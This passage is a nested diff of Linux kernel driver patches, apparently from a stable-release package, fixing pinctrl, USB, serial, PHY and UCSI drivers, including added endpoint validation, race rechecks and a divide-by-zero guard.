++		mlxsw_reg_sbsr_egress_port_mask_set(sbsr_pl,
++						    local_port - first_local_port,
++						    1);
+ 		for (i = 0; i < mlxsw_sp->sb_vals->pool_count; i++) {
+ 			err = mlxsw_sp_sb_pm_occ_clear(mlxsw_sp, local_port, i,
+ 						       &bulk_list);
+diff --git a/drivers/net/phy/micrel.c b/drivers/net/phy/micrel.c
+index 98c6d0caf8faf..90f3953cf9066 100644
+--- a/drivers/net/phy/micrel.c
++++ b/drivers/net/phy/micrel.c
+@@ -3405,6 +3405,7 @@ static struct mdio_device_id __maybe_unused micrel_tbl[] = {
+ 	{ PHY_ID_KSZ8081, MICREL_PHY_ID_MASK },
+ 	{ PHY_ID_KSZ8873MLL, MICREL_PHY_ID_MASK },
+ 	{ PHY_ID_KSZ886X, MICREL_PHY_ID_MASK },
++	{ PHY_ID_KSZ9477, MICREL_PHY_ID_MASK },
+ 	{ PHY_ID_LAN8814, MICREL_PHY_ID_MASK },
+ 	{ PHY_ID_LAN8804, MICREL_PHY_ID_MASK },
+ 	{ }
+diff --git a/drivers/net/usb/ax88179_178a.c b/drivers/net/usb/ax88179_178a.c
+index 53f6efc22f5c9..73de34179f352 100644
+--- a/drivers/net/usb/ax88179_178a.c
++++ b/drivers/net/usb/ax88179_178a.c
+@@ -326,7 +326,8 @@ static void ax88179_status(struct usbnet *dev, struct urb *urb)
+ 
+ 	if (netif_carrier_ok(dev->net) != link) {
+ 		usbnet_link_change(dev, link, 1);
+-		netdev_info(dev->net, "ax88179 - Link status is: %d\n", link);
++		if (!link)
++			netdev_info(dev->net, "ax88179 - Link status is: 0\n");
+ 	}
+ }
+ 
+@@ -1540,6 +1541,7 @@ static int ax88179_link_reset(struct usbnet *dev)
+ 			 GMII_PHY_PHYSR, 2, &tmp16);
+ 
+ 	if (!(tmp16 & GMII_PHY_PHYSR_LINK)) {
++		netdev_info(dev->net, "ax88179 - Link status is: 0\n");
+ 		return 0;
+ 	} else if (GMII_PHY_PHYSR_GIGA == (tmp16 & GMII_PHY_PHYSR_SMASK)) {
+ 		mode |= AX_MEDIUM_GIGAMODE | AX_MEDIUM_EN_125MHZ;
+@@ -1577,6 +1579,8 @@ static int ax88179_link_reset(struct usbnet *dev)
+ 
+ 	netif_carrier_on(dev->net);
+ 
++	netdev_info(dev->net, "ax88179 - Link status is: 1\n");
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/pinctrl/core.c b/drivers/pinctrl/core.c
+index 223482584f54f..db5fc55a5c964 100644
+--- a/drivers/pinctrl/core.c
++++ b/drivers/pinctrl/core.c
+@@ -1092,8 +1092,8 @@ static struct pinctrl *create_pinctrl(struct device *dev,
+ 		 * an -EPROBE_DEFER later, as that is the worst case.
+ 		 */
+ 		if (ret == -EPROBE_DEFER) {
+-			pinctrl_free(p, false);
+ 			mutex_unlock(&pinctrl_maps_mutex);
++			pinctrl_free(p, false);
+ 			return ERR_PTR(ret);
+ 		}
+ 	}
+diff --git a/drivers/pinctrl/pinctrl-rockchip.c b/drivers/pinctrl/pinctrl-rockchip.c
+index 0276b52f37168..d26682f21ad1e 100644
+--- a/drivers/pinctrl/pinctrl-rockchip.c
++++ b/drivers/pinctrl/pinctrl-rockchip.c
+@@ -635,23 +635,68 @@ static struct rockchip_mux_recalced_data rk3308_mux_recalced_data[] = {
+ 
+ static struct rockchip_mux_recalced_data rk3328_mux_recalced_data[] = {
+ 	{
+-		.num = 2,
+-		.pin = 12,
+-		.reg = 0x24,
+-		.bit = 8,
+-		.mask = 0x3
+-	}, {
++		/* gpio2_b7_sel */
+ 		.num = 2,
+ 		.pin = 15,
+ 		.reg = 0x28,
+ 		.bit = 0,
+ 		.mask = 0x7
+ 	}, {
++		/* gpio2_c7_sel */
+ 		.num = 2,
+ 		.pin = 23,
+ 		.reg = 0x30,
+ 		.bit = 14,
+ 		.mask = 0x3
++	}, {
++		/* gpio3_b1_sel */
++		.num = 3,
++		.pin = 9,
++		.reg = 0x44,
++		.bit = 2,
++		.mask = 0x3
++	}, {
++		/* gpio3_b2_sel */
++		.num = 3,
++		.pin = 10,
++		.reg = 0x44,
++		.bit = 4,
++		.mask = 0x3
++	}, {
++		/* gpio3_b3_sel */
++		.num = 3,
++		.pin = 11,
++		.reg = 0x44,
++		.bit = 6,
++		.mask = 0x3
++	}, {
++		/* gpio3_b4_sel */
++		.num = 3,
++		.pin = 12,
++		.reg = 0x44,
++		.bit = 8,
++		.mask = 0x3
++	}, {
++		/* gpio3_b5_sel */
++		.num = 3,
++		.pin = 13,
++		.reg = 0x44,
++		.bit = 10,
++		.mask = 0x3
++	}, {
++		/* gpio3_b6_sel */
++		.num = 3,
++		.pin = 14,
++		.reg = 0x44,
++		.bit = 12,
++		.mask = 0x3
++	}, {
++		/* gpio3_b7_sel */
++		.num = 3,
++		.pin = 15,
++		.reg = 0x44,
++		.bit = 14,
++		.mask = 0x3
+ 	},
+ };
+ 
+@@ -2434,6 +2479,7 @@ static int rockchip_get_pull(struct rockchip_pin_bank *bank, int pin_num)
+ 	case RK3188:
+ 	case RK3288:
+ 	case RK3308:
++	case RK3328:
+ 	case RK3368:
+ 	case RK3399:
+ 	case RK3568:
+@@ -2492,6 +2538,7 @@ static int rockchip_set_pull(struct rockchip_pin_bank *bank,
+ 	case RK3188:
+ 	case RK3288:
+ 	case RK3308:
++	case RK3328:
+ 	case RK3368:
+ 	case RK3399:
+ 	case RK3568:
+@@ -2705,8 +2752,10 @@ static int rockchip_pmx_set(struct pinctrl_dev *pctldev, unsigned selector,
+ 
+ 	if (ret) {
+ 		/* revert the already done pin settings */
+-		for (cnt--; cnt >= 0; cnt--)
++		for (cnt--; cnt >= 0; cnt--) {
++			bank = pin_to_bank(info, pins[cnt]);
+ 			rockchip_set_mux(bank, pins[cnt] - bank->pin_base, 0);
++		}
+ 
+ 		return ret;
+ 	}
+@@ -2754,6 +2803,7 @@ static bool rockchip_pinconf_pull_valid(struct rockchip_pin_ctrl *ctrl,
+ 	case RK3188:
+ 	case RK3288:
+ 	case RK3308:
++	case RK3328:
+ 	case RK3368:
+ 	case RK3399:
+ 	case RK3568:
+@@ -3766,7 +3816,7 @@ static struct rockchip_pin_bank rk3328_pin_banks[] = {
+ 	PIN_BANK_IOMUX_FLAGS(0, 32, "gpio0", 0, 0, 0, 0),
+ 	PIN_BANK_IOMUX_FLAGS(1, 32, "gpio1", 0, 0, 0, 0),
+ 	PIN_BANK_IOMUX_FLAGS(2, 32, "gpio2", 0,
+-			     IOMUX_WIDTH_3BIT,
++			     0,
+ 			     IOMUX_WIDTH_3BIT,
+ 			     0),
+ 	PIN_BANK_IOMUX_FLAGS(3, 32, "gpio3",
+@@ -3780,7 +3830,7 @@ static struct rockchip_pin_ctrl rk3328_pin_ctrl = {
+ 		.pin_banks		= rk3328_pin_banks,
+ 		.nr_banks		= ARRAY_SIZE(rk3328_pin_banks),
+ 		.label			= "RK3328-GPIO",
+-		.type			= RK3288,
++		.type			= RK3328,
+ 		.grf_mux_offset		= 0x0,
+ 		.iomux_recalced		= rk3328_mux_recalced_data,
+ 		.niomux_recalced	= ARRAY_SIZE(rk3328_mux_recalced_data),
+diff --git a/drivers/pinctrl/pinctrl-rockchip.h b/drivers/pinctrl/pinctrl-rockchip.h
+index 4759f336941ef..849266f8b1913 100644
+--- a/drivers/pinctrl/pinctrl-rockchip.h
++++ b/drivers/pinctrl/pinctrl-rockchip.h
+@@ -193,6 +193,7 @@ enum rockchip_pinctrl_type {
+ 	RK3188,
+ 	RK3288,
+ 	RK3308,
++	RK3328,
+ 	RK3368,
+ 	RK3399,
+ 	RK3568,
+diff --git a/drivers/pinctrl/qcom/pinctrl-spmi-gpio.c b/drivers/pinctrl/qcom/pinctrl-spmi-gpio.c
+index 8c31a8f6b7e4e..6d43c2123e69a 100644
+--- a/drivers/pinctrl/qcom/pinctrl-spmi-gpio.c
++++ b/drivers/pinctrl/qcom/pinctrl-spmi-gpio.c
+@@ -1204,7 +1204,6 @@ static const struct of_device_id pmic_gpio_of_match[] = {
+ 	{ .compatible = "qcom,pm7250b-gpio", .data = (void *) 12 },
+ 	{ .compatible = "qcom,pm7325-gpio", .data = (void *) 10 },
+ 	{ .compatible = "qcom,pm8005-gpio", .data = (void *) 4 },
+-	{ .compatible = "qcom,pm8008-gpio", .data = (void *) 2 },
+ 	{ .compatible = "qcom,pm8019-gpio", .data = (void *) 6 },
+ 	/* pm8150 has 10 GPIOs with holes on 2, 5, 7 and 8 */
+ 	{ .compatible = "qcom,pm8150-gpio", .data = (void *) 10 },
+diff --git a/drivers/pwm/pwm-stm32.c b/drivers/pwm/pwm-stm32.c
+index bdcdb7f38312b..c40a6548ce7d4 100644
+--- a/drivers/pwm/pwm-stm32.c
++++ b/drivers/pwm/pwm-stm32.c
+@@ -340,6 +340,9 @@ static int stm32_pwm_config(struct stm32_pwm *priv, int ch,
+ 
+ 	prd = div;
+ 
++	if (!prd)
++		return -EINVAL;
++
+ 	if (prescaler > MAX_TIM_PSC)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/soc/ti/wkup_m3_ipc.c b/drivers/soc/ti/wkup_m3_ipc.c
+index 343c58ed58961..103d793bae748 100644
+--- a/drivers/soc/ti/wkup_m3_ipc.c
++++ b/drivers/soc/ti/wkup_m3_ipc.c
+@@ -16,7 +16,6 @@
+ #include <linux/irq.h>
+ #include <linux/module.h>
+ #include <linux/of.h>
+-#include <linux/omap-mailbox.h>
+ #include <linux/platform_device.h>
+ #include <linux/remoteproc.h>
+ #include <linux/suspend.h>
+@@ -314,7 +313,6 @@ static irqreturn_t wkup_m3_txev_handler(int irq, void *ipc_data)
+ static int wkup_m3_ping(struct wkup_m3_ipc *m3_ipc)
+ {
+ 	struct device *dev = m3_ipc->dev;
+-	mbox_msg_t dummy_msg = 0;
+ 	int ret;
+ 
+ 	if (!m3_ipc->mbox) {
+@@ -330,7 +328,7 @@ static int wkup_m3_ping(struct wkup_m3_ipc *m3_ipc)
+ 	 * the RX callback to avoid multiple interrupts being received
+ 	 * by the CM3.
+ 	 */
+-	ret = mbox_send_message(m3_ipc->mbox, &dummy_msg);
++	ret = mbox_send_message(m3_ipc->mbox, NULL);
+ 	if (ret < 0) {
+ 		dev_err(dev, "%s: mbox_send_message() failed: %d\n",
+ 			__func__, ret);
+@@ -352,7 +350,6 @@ static int wkup_m3_ping(struct wkup_m3_ipc *m3_ipc)
+ static int wkup_m3_ping_noirq(struct wkup_m3_ipc *m3_ipc)
+ {
+ 	struct device *dev = m3_ipc->dev;
+-	mbox_msg_t dummy_msg = 0;
+ 	int ret;
+ 
+ 	if (!m3_ipc->mbox) {
+@@ -361,7 +358,7 @@ static int wkup_m3_ping_noirq(struct wkup_m3_ipc *m3_ipc)
+ 		return -EIO;
+ 	}
+ 
+-	ret = mbox_send_message(m3_ipc->mbox, &dummy_msg);
++	ret = mbox_send_message(m3_ipc->mbox, NULL);
+ 	if (ret < 0) {
+ 		dev_err(dev, "%s: mbox_send_message() failed: %d\n",
+ 			__func__, ret);
+diff --git a/drivers/tty/serial/8250/8250_omap.c b/drivers/tty/serial/8250/8250_omap.c
+index 037d613006f56..a3eaf293f2048 100644
+--- a/drivers/tty/serial/8250/8250_omap.c
++++ b/drivers/tty/serial/8250/8250_omap.c
+@@ -159,6 +159,10 @@ static u32 uart_read(struct omap8250_priv *priv, u32 reg)
+ 	return readl(priv->membase + (reg << OMAP_UART_REGSHIFT));
+ }
+ 
++/* Timeout low and High */
++#define UART_OMAP_TO_L                 0x26
++#define UART_OMAP_TO_H                 0x27
++
+ /*
+  * Called on runtime PM resume path from omap8250_restore_regs(), and
+  * omap8250_set_mctrl().
+@@ -628,13 +632,25 @@ static irqreturn_t omap8250_irq(int irq, void *dev_id)
+ 
+ 	/*
+ 	 * On K3 SoCs, it is observed that RX TIMEOUT is signalled after
+-	 * FIFO has been drained, in which case a dummy read of RX FIFO
+-	 * is required to clear RX TIMEOUT condition.
++	 * FIFO has been drained or erroneously.
++	 * So apply solution of Errata i2310 as mentioned in
++	 * https://www.ti.com/lit/pdf/sprz536
+ 	 */
+ 	if (priv->habit & UART_RX_TIMEOUT_QUIRK &&
+ 	    (iir & UART_IIR_RX_TIMEOUT) == UART_IIR_RX_TIMEOUT &&
+ 	    serial_port_in(port, UART_OMAP_RX_LVL) == 0) {
+-		serial_port_in(port, UART_RX);
++		unsigned char efr2, timeout_h, timeout_l;
++
++		efr2 = serial_in(up, UART_OMAP_EFR2);
++		timeout_h = serial_in(up, UART_OMAP_TO_H);
++		timeout_l = serial_in(up, UART_OMAP_TO_L);
++		serial_out(up, UART_OMAP_TO_H, 0xFF);
++		serial_out(up, UART_OMAP_TO_L, 0xFF);
++		serial_out(up, UART_OMAP_EFR2, UART_OMAP_EFR2_TIMEOUT_BEHAVE);
++		serial_in(up, UART_IIR);
++		serial_out(up, UART_OMAP_EFR2, efr2);
++		serial_out(up, UART_OMAP_TO_H, timeout_h);
++		serial_out(up, UART_OMAP_TO_L, timeout_l);
+ 	}
+ 
+ 	/* Stop processing interrupts on input overrun */
+diff --git a/drivers/tty/serial/imx.c b/drivers/tty/serial/imx.c
+index b20abaa9ef150..40e59e72d5e9e 100644
+--- a/drivers/tty/serial/imx.c
++++ b/drivers/tty/serial/imx.c
+@@ -120,6 +120,7 @@
+ #define UCR4_OREN	(1<<1)	/* Receiver overrun interrupt enable */
+ #define UCR4_DREN	(1<<0)	/* Recv data ready interrupt enable */
+ #define UFCR_RXTL_SHF	0	/* Receiver trigger level shift */
++#define UFCR_RXTL_MASK	0x3F	/* Receiver trigger 6 bits wide */
+ #define UFCR_DCEDTE	(1<<6)	/* DCE/DTE mode select */
+ #define UFCR_RFDIV	(7<<7)	/* Reference freq divider mask */
+ #define UFCR_RFDIV_REG(x)	(((x) < 7 ? 6 - (x) : 6) << 7)
+@@ -1959,7 +1960,7 @@ static int imx_uart_rs485_config(struct uart_port *port, struct ktermios *termio
+ 				 struct serial_rs485 *rs485conf)
+ {
+ 	struct imx_port *sport = (struct imx_port *)port;
+-	u32 ucr2;
++	u32 ucr2, ufcr;
+ 
+ 	if (rs485conf->flags & SER_RS485_ENABLED) {
+ 		/* Enable receiver if low-active RTS signal is requested */
+@@ -1978,8 +1979,13 @@ static int imx_uart_rs485_config(struct uart_port *port, struct ktermios *termio
+ 
+ 	/* Make sure Rx is enabled in case Tx is active with Rx disabled */
+ 	if (!(rs485conf->flags & SER_RS485_ENABLED) ||
+-	    rs485conf->flags & SER_RS485_RX_DURING_TX)
++	    rs485conf->flags & SER_RS485_RX_DURING_TX) {
++		/* If the receiver trigger is 0, set it to a default value */
++		ufcr = imx_uart_readl(sport, UFCR);
++		if ((ufcr & UFCR_RXTL_MASK) == 0)
++			imx_uart_setup_ufcr(sport, TXTL_DEFAULT, RXTL_DEFAULT);
+ 		imx_uart_start_rx(port);
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/tty/serial/mcf.c b/drivers/tty/serial/mcf.c
+index b1cd9a76dd93b..1374b4e82d75f 100644
+--- a/drivers/tty/serial/mcf.c
++++ b/drivers/tty/serial/mcf.c
+@@ -480,7 +480,7 @@ static const struct uart_ops mcf_uart_ops = {
+ 	.verify_port	= mcf_verify_port,
+ };
+ 
+-static struct mcf_uart mcf_ports[4];
++static struct mcf_uart mcf_ports[10];
+ 
+ #define	MCF_MAXPORTS	ARRAY_SIZE(mcf_ports)
+ 
+diff --git a/drivers/usb/atm/cxacru.c b/drivers/usb/atm/cxacru.c
+index 4ce7cba2b48aa..8f3b9a0a38e1d 100644
+--- a/drivers/usb/atm/cxacru.c
++++ b/drivers/usb/atm/cxacru.c
+@@ -1131,6 +1131,7 @@ static int cxacru_bind(struct usbatm_data *usbatm_instance,
+ 	struct cxacru_data *instance;
+ 	struct usb_device *usb_dev = interface_to_usbdev(intf);
+ 	struct usb_host_endpoint *cmd_ep = usb_dev->ep_in[CXACRU_EP_CMD];
++	struct usb_endpoint_descriptor *in, *out;
+ 	int ret;
+ 
+ 	/* instance init */
+@@ -1177,6 +1178,19 @@ static int cxacru_bind(struct usbatm_data *usbatm_instance,
+ 		goto fail;
+ 	}
+ 
++	if (usb_endpoint_xfer_int(&cmd_ep->desc))
++		ret = usb_find_common_endpoints(intf->cur_altsetting,
++						NULL, NULL, &in, &out);
++	else
++		ret = usb_find_common_endpoints(intf->cur_altsetting,
++						&in, &out, NULL, NULL);
++
++	if (ret) {
++		usb_err(usbatm_instance, "cxacru_bind: interface has incorrect endpoints\n");
++		ret = -ENODEV;
++		goto fail;
++	}
++
+ 	if ((cmd_ep->desc.bmAttributes & USB_ENDPOINT_XFERTYPE_MASK)
+ 			== USB_ENDPOINT_XFER_INT) {
+ 		usb_fill_int_urb(instance->rcv_urb,
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 3b5482621e5e0..94bc7786a3c4e 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -2087,7 +2087,6 @@ static int dwc3_core_init_for_resume(struct dwc3 *dwc)
+ 
+ static int dwc3_suspend_common(struct dwc3 *dwc, pm_message_t msg)
+ {
+-	unsigned long	flags;
+ 	u32 reg;
+ 
+ 	switch (dwc->current_dr_role) {
+@@ -2125,9 +2124,7 @@ static int dwc3_suspend_common(struct dwc3 *dwc, pm_message_t msg)
+ 			break;
+ 
+ 		if (dwc->current_otg_role == DWC3_OTG_ROLE_DEVICE) {
+-			spin_lock_irqsave(&dwc->lock, flags);
+ 			dwc3_gadget_suspend(dwc);
+-			spin_unlock_irqrestore(&dwc->lock, flags);
+ 			synchronize_irq(dwc->irq_gadget);
+ 		}
+ 
+@@ -2144,7 +2141,6 @@ static int dwc3_suspend_common(struct dwc3 *dwc, pm_message_t msg)
+ 
+ static int dwc3_resume_common(struct dwc3 *dwc, pm_message_t msg)
+ {
+-	unsigned long	flags;
+ 	int		ret;
+ 	u32		reg;
+ 
+@@ -2193,9 +2189,7 @@ static int dwc3_resume_common(struct dwc3 *dwc, pm_message_t msg)
+ 		if (dwc->current_otg_role == DWC3_OTG_ROLE_HOST) {
+ 			dwc3_otg_host_init(dwc);
+ 		} else if (dwc->current_otg_role == DWC3_OTG_ROLE_DEVICE) {
+-			spin_lock_irqsave(&dwc->lock, flags);
+ 			dwc3_gadget_resume(dwc);
+-			spin_unlock_irqrestore(&dwc->lock, flags);
+ 		}
+ 
+ 		break;
+diff --git a/drivers/usb/gadget/function/f_printer.c b/drivers/usb/gadget/function/f_printer.c
+index 8545656419c71..65378266fd84e 100644
+--- a/drivers/usb/gadget/function/f_printer.c
++++ b/drivers/usb/gadget/function/f_printer.c
+@@ -210,6 +210,7 @@ static inline struct usb_endpoint_descriptor *ep_desc(struct usb_gadget *gadget,
+ 					struct usb_endpoint_descriptor *ss)
+ {
+ 	switch (gadget->speed) {
++	case USB_SPEED_SUPER_PLUS:
+ 	case USB_SPEED_SUPER:
+ 		return ss;
+ 	case USB_SPEED_HIGH:
+@@ -447,11 +448,8 @@ printer_read(struct file *fd, char __user *buf, size_t len, loff_t *ptr)
+ 	mutex_lock(&dev->lock_printer_io);
+ 	spin_lock_irqsave(&dev->lock, flags);
+ 
+-	if (dev->interface < 0) {
+-		spin_unlock_irqrestore(&dev->lock, flags);
+-		mutex_unlock(&dev->lock_printer_io);
+-		return -ENODEV;
+-	}
++	if (dev->interface < 0)
++		goto out_disabled;
+ 
+ 	/* We will use this flag later to check if a printer reset happened
+ 	 * after we turn interrupts back on.
+@@ -459,6 +457,9 @@ printer_read(struct file *fd, char __user *buf, size_t len, loff_t *ptr)
+ 	dev->reset_printer = 0;
+ 
+ 	setup_rx_reqs(dev);
++	/* this dropped the lock - need to retest */
++	if (dev->interface < 0)
++		goto out_disabled;
+ 
+ 	bytes_copied = 0;
+ 	current_rx_req = dev->current_rx_req;
+@@ -492,6 +493,8 @@ printer_read(struct file *fd, char __user *buf, size_t len, loff_t *ptr)
+ 		wait_event_interruptible(dev->rx_wait,
+ 				(likely(!list_empty(&dev->rx_buffers))));
+ 		spin_lock_irqsave(&dev->lock, flags);
++		if (dev->interface < 0)
++			goto out_disabled;
+ 	}
+ 
+ 	/* We have data to return then copy it to the caller's buffer.*/
+@@ -535,6 +538,9 @@ printer_read(struct file *fd, char __user *buf, size_t len, loff_t *ptr)
+ 			return -EAGAIN;
+ 		}
+ 
++		if (dev->interface < 0)
++			goto out_disabled;
++
+ 		/* If we not returning all the data left in this RX request
+ 		 * buffer then adjust the amount of data left in the buffer.
+ 		 * Othewise if we are done with this RX request buffer then
+@@ -564,6 +570,11 @@ printer_read(struct file *fd, char __user *buf, size_t len, loff_t *ptr)
+ 		return bytes_copied;
+ 	else
+ 		return -EAGAIN;
++
++out_disabled:
++	spin_unlock_irqrestore(&dev->lock, flags);
++	mutex_unlock(&dev->lock_printer_io);
++	return -ENODEV;
+ }
+ 
+ static ssize_t
+@@ -584,11 +595,8 @@ printer_write(struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
+ 	mutex_lock(&dev->lock_printer_io);
+ 	spin_lock_irqsave(&dev->lock, flags);
+ 
+-	if (dev->interface < 0) {
+-		spin_unlock_irqrestore(&dev->lock, flags);
+-		mutex_unlock(&dev->lock_printer_io);
+-		return -ENODEV;
+-	}
++	if (dev->interface < 0)
++		goto out_disabled;
+ 
+ 	/* Check if a printer reset happens while we have interrupts on */
+ 	dev->reset_printer = 0;
+@@ -611,6 +619,8 @@ printer_write(struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
+ 		wait_event_interruptible(dev->tx_wait,
+ 				(likely(!list_empty(&dev->tx_reqs))));
+ 		spin_lock_irqsave(&dev->lock, flags);
++		if (dev->interface < 0)
++			goto out_disabled;
+ 	}
+ 
+ 	while (likely(!list_empty(&dev->tx_reqs)) && len) {
+@@ -660,6 +670,9 @@ printer_write(struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
+ 			return -EAGAIN;
+ 		}
+ 
++		if (dev->interface < 0)
++			goto out_disabled;
++
+ 		list_add(&req->list, &dev->tx_reqs_active);
+ 
+ 		/* here, we unlock, and only unlock, to avoid deadlock. */
+@@ -672,6 +685,8 @@ printer_write(struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
+ 			mutex_unlock(&dev->lock_printer_io);
+ 			return -EAGAIN;
+ 		}
++		if (dev->interface < 0)
++			goto out_disabled;
+ 	}
+ 
+ 	spin_unlock_irqrestore(&dev->lock, flags);
+@@ -683,6 +698,11 @@ printer_write(struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
+ 		return bytes_copied;
+ 	else
+ 		return -EAGAIN;
++
++out_disabled:
++	spin_unlock_irqrestore(&dev->lock, flags);
++	mutex_unlock(&dev->lock_printer_io);
++	return -ENODEV;
+ }
+ 
+ static int
+diff --git a/drivers/usb/gadget/udc/aspeed_udc.c b/drivers/usb/gadget/udc/aspeed_udc.c
+index 01968e2167f91..cedf17e38245d 100644
+--- a/drivers/usb/gadget/udc/aspeed_udc.c
++++ b/drivers/usb/gadget/udc/aspeed_udc.c
+@@ -66,8 +66,8 @@
+ #define USB_UPSTREAM_EN			BIT(0)
+ 
+ /* Main config reg */
+-#define UDC_CFG_SET_ADDR(x)		((x) & 0x3f)
+-#define UDC_CFG_ADDR_MASK		(0x3f)
++#define UDC_CFG_SET_ADDR(x)		((x) & UDC_CFG_ADDR_MASK)
++#define UDC_CFG_ADDR_MASK		GENMASK(6, 0)
+ 
+ /* Interrupt ctrl & status reg */
+ #define UDC_IRQ_EP_POOL_NAK		BIT(17)
+diff --git a/drivers/usb/musb/da8xx.c b/drivers/usb/musb/da8xx.c
+index a4e55b0c52cff..1aae581434647 100644
+--- a/drivers/usb/musb/da8xx.c
++++ b/drivers/usb/musb/da8xx.c
+@@ -553,7 +553,7 @@ static int da8xx_probe(struct platform_device *pdev)
+ 	ret = of_platform_populate(pdev->dev.of_node, NULL,
+ 				   da8xx_auxdata_lookup, &pdev->dev);
+ 	if (ret)
+-		return ret;
++		goto err_unregister_phy;
+ 
+ 	pinfo = da8xx_dev_info;
+ 	pinfo.parent = &pdev->dev;
+@@ -568,9 +568,13 @@ static int da8xx_probe(struct platform_device *pdev)
+ 	ret = PTR_ERR_OR_ZERO(glue->musb);
+ 	if (ret) {
+ 		dev_err(&pdev->dev, "failed to register musb device: %d\n", ret);
+-		usb_phy_generic_unregister(glue->usb_phy);
++		goto err_unregister_phy;
+ 	}
+ 
++	return 0;
++
++err_unregister_phy:
++	usb_phy_generic_unregister(glue->usb_phy);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index a163218fdc749..1e4059521eb0a 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -36,22 +36,16 @@
+  */
+ #define UCSI_SWAP_TIMEOUT_MS	5000
+ 
+-static int ucsi_acknowledge_command(struct ucsi *ucsi)
++static int ucsi_acknowledge(struct ucsi *ucsi, bool conn_ack)
+ {
+ 	u64 ctrl;
+ 
+ 	ctrl = UCSI_ACK_CC_CI;
+ 	ctrl |= UCSI_ACK_COMMAND_COMPLETE;
+-
+-	return ucsi->ops->sync_write(ucsi, UCSI_CONTROL, &ctrl, sizeof(ctrl));
+-}
+-
+-static int ucsi_acknowledge_connector_change(struct ucsi *ucsi)
+-{
+-	u64 ctrl;
+-
+-	ctrl = UCSI_ACK_CC_CI;
+-	ctrl |= UCSI_ACK_CONNECTOR_CHANGE;
++	if (conn_ack) {
++		clear_bit(EVENT_PENDING, &ucsi->flags);
++		ctrl |= UCSI_ACK_CONNECTOR_CHANGE;
++	}
+ 
+ 	return ucsi->ops->sync_write(ucsi, UCSI_CONTROL, &ctrl, sizeof(ctrl));
+ }
+@@ -64,7 +58,7 @@ static int ucsi_read_error(struct ucsi *ucsi)
+ 	int ret;
+ 
+ 	/* Acknowledge the command that failed */
+-	ret = ucsi_acknowledge_command(ucsi);
++	ret = ucsi_acknowledge(ucsi, false);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -76,7 +70,7 @@ static int ucsi_read_error(struct ucsi *ucsi)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = ucsi_acknowledge_command(ucsi);
++	ret = ucsi_acknowledge(ucsi, false);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -139,28 +133,33 @@ static int ucsi_exec_command(struct ucsi *ucsi, u64 cmd)
+ 		return -EIO;
+ 
+ 	if (cci & UCSI_CCI_NOT_SUPPORTED) {
+-		if (ucsi_acknowledge_command(ucsi) < 0)
++		if (ucsi_acknowledge(ucsi, false) < 0)
+ 			dev_err(ucsi->dev,
+ 				"ACK of unsupported command failed\n");
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+ 	if (cci & UCSI_CCI_ERROR) {
+-		if (cmd == UCSI_GET_ERROR_STATUS)
++		if (cmd == UCSI_GET_ERROR_STATUS) {
++			ret = ucsi_acknowledge(ucsi, false);
++			if (ret)
++				return ret;
++
+ 			return -EIO;
++		}
+ 		return ucsi_read_error(ucsi);
+ 	}
+ 
+ 	if (cmd == UCSI_CANCEL && cci & UCSI_CCI_CANCEL_COMPLETE) {
+-		ret = ucsi_acknowledge_command(ucsi);
++		ret = ucsi_acknowledge(ucsi, false);
+ 		return ret ? ret : -EBUSY;
+ 	}
+ 
+ 	return UCSI_CCI_LENGTH(cci);
+ }
+ 
+-int ucsi_send_command(struct ucsi *ucsi, u64 command,
+-		      void *data, size_t size)
++static int ucsi_send_command_common(struct ucsi *ucsi, u64 command,
++				    void *data, size_t size, bool conn_ack)
+ {
+ 	u8 length;
+ 	int ret;
+@@ -179,7 +178,7 @@ int ucsi_send_command(struct ucsi *ucsi, u64 command,
+ 			goto out;
+ 	}
+ 
+-	ret = ucsi_acknowledge_command(ucsi);
++	ret = ucsi_acknowledge(ucsi, conn_ack);
+ 	if (ret)
+ 		goto out;
+ 
+@@ -188,6 +187,12 @@ int ucsi_send_command(struct ucsi *ucsi, u64 command,
+ 	mutex_unlock(&ucsi->ppm_lock);
+ 	return ret;
+ }
++
++int ucsi_send_command(struct ucsi *ucsi, u64 command,
++		      void *data, size_t size)
++{
++	return ucsi_send_command_common(ucsi, command, data, size, false);
++}
+ EXPORT_SYMBOL_GPL(ucsi_send_command);
+ 
+ /* -------------------------------------------------------------------------- */
+@@ -785,7 +790,9 @@ static void ucsi_handle_connector_change(struct work_struct *work)
+ 	mutex_lock(&con->lock);
+ 
+ 	command = UCSI_GET_CONNECTOR_STATUS | UCSI_CONNECTOR_NUMBER(con->num);
+-	ret = ucsi_send_command(ucsi, command, &con->status, sizeof(con->status));
++
++	ret = ucsi_send_command_common(ucsi, command, &con->status,
++				       sizeof(con->status), true);
+ 	if (ret < 0) {
+ 		dev_err(ucsi->dev, "%s: GET_CONNECTOR_STATUS failed (%d)\n",
+ 			__func__, ret);
+@@ -833,14 +840,6 @@ static void ucsi_handle_connector_change(struct work_struct *work)
+ 	if (con->status.change & UCSI_CONSTAT_CAM_CHANGE)
+ 		ucsi_partner_task(con, ucsi_check_altmodes, 1, 0);
+ 
+-	mutex_lock(&ucsi->ppm_lock);
+-	clear_bit(EVENT_PENDING, &con->ucsi->flags);
+-	ret = ucsi_acknowledge_connector_change(ucsi);
+-	mutex_unlock(&ucsi->ppm_lock);
+-
+-	if (ret)
+-		dev_err(ucsi->dev, "%s: ACK failed (%d)", __func__, ret);
+-
+ out_unlock:
+ 	mutex_unlock(&con->lock);
+ }
+diff --git a/drivers/usb/typec/ucsi/ucsi_stm32g0.c b/drivers/usb/typec/ucsi/ucsi_stm32g0.c
+index 7b92f0c8de708..8c3b052f6208f 100644
